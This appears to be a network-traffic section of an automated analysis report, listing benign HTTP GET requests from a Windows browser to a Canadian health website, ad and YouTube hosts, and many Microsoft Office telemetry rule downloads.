Source: global traffic HTTP traffic detected: GET /sites/default/files/FOH%20-%20Favicon.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/twitter-t.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/css/img/icons8-search-28.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/Aging_featured-2.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/speakers-420.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /vi_webp/h15NcT6UXh0/sddefault.webp HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/doctor-21.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/wellness-app.gif HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/FOH%20-%20Favicon.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-11/Group%209826%20%281%29.png?itok=xYH_8dLj HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-12/Group%209825%20%282%29.png?itok=vf0UJVIa HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120600v5s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
